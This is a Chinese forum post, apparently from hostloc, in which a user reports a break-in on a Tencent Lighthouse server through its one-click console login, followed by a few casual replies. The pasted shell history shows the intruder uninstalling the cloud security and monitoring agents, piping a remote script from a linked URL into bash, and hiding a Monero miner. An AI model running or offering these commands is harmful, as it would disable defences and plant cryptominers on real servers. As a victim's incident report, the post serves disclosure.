共计 691 个字符,预计需要花费 2 分钟才能阅读完成。
前帖:https://hostloc.com/thread-1021600-1-1.html
轻量后台有个 一键登陆的锅
后门 脚本:https://5.linshi.co/ww80.sh
找到 lighthouse 日志看到的 由于权限有限,所以除了挖矿搞不了啥,把一键登录关了,删了挖矿就好了。
#1651856332 sudo -i #1651856364 /usr/local/qcloud/stargate/admin/uninstall.sh #1651856364 /usr/local/qcloud/YunJing/uninst.sh #1651856364 /usr/local/qcloud/monitor/barad/admin/uninstall.sh #1651856364 sudo -i #1651856368 exit #1651856382 curl -s -L https://5.linshi.co/ww80.sh | bash -s 100023489107 #1651856398 mv moneroocean .moneroocean #1651856408 lsls #1651856422 ls -a #1653293830 w #1653293952 exit
|
网友回复:
注册 : 不知所云
Tou: 啥轻量漏洞,给个上下文
HOH: 你怎么发现
nnt: 不知所云
菜单 : 我敢说这个脚本作者是 mjj 的一员
tboy: echo “[*] Setup complete by zjzjzjzj” 复制代码
司马南 : 是他这个脚本我看到了小众的源码
zxxx: 老哥牛逼。。。
司马南 : 是不是关闭了一键登陆就行了
注册 : 自己反思一下
注册 : 家贼难防
表妹 : Yes